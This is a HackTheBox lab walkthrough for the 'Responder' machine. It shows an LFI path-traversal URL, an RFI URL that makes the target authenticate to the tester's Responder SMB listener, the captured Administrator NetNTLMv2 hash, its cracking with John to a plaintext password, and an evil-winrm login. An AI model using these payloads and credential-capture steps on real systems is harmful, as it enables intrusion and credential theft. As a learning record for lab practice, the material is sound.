Local File Inclusion (LFI) vulnerability, & Remote File Inclusion
This is a note for my HackTheBox practice. The machine being pwned here is called Responder.
Props to dotguy from HTB for sharing the knowledge. 🥂
Keywords : Responder utility, NetNTLMv2 hash, NTLM authentication, Local File Inclusion (LFI) vulnerability, Remote File Inclusion, WinRM service.
Main Concept
(Step 1) Enumeration with nmap
- nmap options to keep in mind
-v : Increase the verbosity level (basically output more info)
-p- : This flag scans for all TCP ports ranging from 0-65535
-sV : Attempts to determine the version of the service running on a port
-sC : Scan with default NSE scripts
--min-rate : This is used to specify the minimum number of packets Nmap should send per
second; it speeds up the scan as the number goes higher
open TCP ports:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
80 : Hypertext Transfer Protocol (HTTP) uses TCP in versions 1.x and 2. HTTP/3 uses QUIC, a transport protocol on top of UDP.
5985 : Windows PowerShell Default psSession Port Windows Remote Management Service (WinRM-HTTP)
(Step 2) Website Enumeration
- entering
http://[target ip]is not possible - web server checks the domain name provided in the
Hostheader field of the HTTP request /etc/hostsfile is used to resolve a hostname into an IP address- we will need to add an entry in
the
/etc/hostsfile for this domain to enable the browser to resolve the address forunika.htb. - resolve address, with
/etc/hosts$ echo "10.129.13.73 unika.htb" | sudo tee -a /etc/hosts
(Step 3) Looking into ‘File Inclusion Vulnerability’
traverse through the URL (Local File Inclusion (LFI) vulnerability) :
http://unika.htb/index.php?
page=../../../../../../../../windows/system32/drivers/etc/hosts
(Step 3.1) Responder Challenge Capture
‘Responder’ tool; how does it work?
Responder can do many different kinds of attacks, but for this scenario, it will set up a malicious SMB server.
- When the target machine attempts to perform the NTLM authentication to that server,
- Responder sends a challenge back for the server to encrypt with the user’s password.
- When the server responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2.
- While we can’t reverse the
NetNTLMv2, we can try many different common passwords to see if any generate the same challenge
response, and if we find one, we know that is the password.
- This is often referred to as hash cracking, which we’ll do with a program called John The Ripper.
in Responder.conf, confirm that SMB = On (set to listen for SMB requests)
[Responder Core]
; Servers to start
SQL = On
SMB = On
output of $ echo "10.129.187.145 unika.htb" | sudo tee -a /etc/hosts
<SNIP>
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.19] #SMB server's IP?
Responder IPv6 [dead:beef:4::1011]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-O9008WABG31]
Responder Domain Name [H8FX.LOCAL]
Responder DCE-RPC Port [47617]
<SNIP>
on Responder (on terminal), output after http://unika.htb/index.php?page=//10.10.16.19/whatever keyed into the browser (Remote File Inclusion) ;
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.129.187.145
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:af8154f76a06d429:6E1B497171F7C68F457E520B042B0C1E:010100000000000080D9B328A950D801823296FDB2474A760000000002000800580058004D00320001001E00570049004E002D00440039003900340057005A00500045004A004B00510004003400570049004E002D00440039003900340057005A00500045004A004B0051002E00580058004D0032002E004C004F00430041004C0003001400580058004D0032002E004C004F00430041004C0005001400580058004D0032002E004C004F00430041004C000700080080D9B328A950D801060004000200000008003000300000000000000001000000002000000AC38578AF629A9DF97275592C70E770C61E3C03C8CF5FA452D2571F4B7793230A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310039000000000000000000
(Step 4) Hash Cracking
using John The Ripper $ john; option -w
-w : wordlist to use for cracking the hash
output
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-04-15 09:21) 25.00g/s 102400p/s 102400c/s 102400C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
badminton (Administrator)
password : badminton
then use EvilWinRM
evil-winrm -i 10.129.187.145 -u administrator -p badminton
finding the flag;
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users> cd mike\Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> more flag.txt
[FLAG WRITTEN HERE]
Tools, Commands
More notes
- most organizations use Active Directory to set up their Windows domain networks.
- Microsoft employs NTLM (New Technology LAN Manager) & Kerberos for authentication services.
- File Inclusion vulnerability, on windows machines.
- NTLMv2 (or more formally Net-NTLMv2) is a challenge-response authentication protocol that Windows clients use to authenticate to other Windows servers.
- TCP ports source
- Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as Operating Systems and applications.
- Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname.
- resolve address (in computing)
- sanitization (in computing) : for security purposes, we protect the system from malicious data.
include()method of PHP : Theincludestatement takes all the text/code/markup that exists in the specified file and loads it into the memory, making it available for use.- example
File 1 --> vars.php <?php $color = 'green'; $fruit = 'apple'; ?> ############################################# File 2 --> test.php <?php echo "A $color $fruit"; // output = "A" include 'vars.php'; echo "A $color $fruit"; // output = "A green apple" ?> - A hash function is a one way function that takes any amount of data and returns a fixed size value.
- An NTHash is the output of the algorithm used to store passwords on Windows systems in the SAM database and on domain controllers.
- NTLM ; challenge / response model ; Challenge–response authentication
- to test with some commonly known files that will have the same name across networks, Windows domains, and systems which can be found here.
- SMB URLs
- SMB server
- SMB share
python3:-Ioption can be used to run the script in isolated mode wheresys.pathcontains neither the current directory nor the user’s site-packages directory.- Which flag do we use in the Responder utility to specify the network interface?
- WinRM service
- evilWinRM : https://github.com/Hackplayers/evil-winrm
5985: We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Disclaimer : Some of the words here are not written by me. This page serves merely as my notes.